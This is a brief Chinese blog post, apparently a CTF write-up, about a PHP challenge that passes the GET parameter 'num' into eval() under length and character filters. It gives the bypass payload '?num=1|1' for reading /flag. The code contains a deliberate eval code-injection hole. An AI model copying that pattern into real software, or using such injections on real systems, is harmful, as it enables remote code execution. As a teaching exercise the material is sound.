博客给出GET传参num的源代码,规定num为字符串,长度小于5,不能含111和0,还有动态求值条件判断其是否等于111,同时给出了相应的payload示例,即?num=1|1。
给出源代码:
<?php
highlight_file(__FILE__);
$num = $_GET['num'];
if(is_string($num) && strlen($num) < 5 && strpos($num,'111') === false && strpos($num,'0') === false && eval("return 111===${num};")){
readfile('/flag');
}
?> GET传num,他是字符串,长度小于5,字符串中不能有111和0
最后一个条件:
eval("return 111===${num};"):这是一个动态求值的条件,它会把 $num 替换到 ${num} 中,并判断 $num 是否等于 111。
先给payload:
?num=1|1因为return (111===1) or 1 所以 ?num=1|1
扫一扫
1899
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
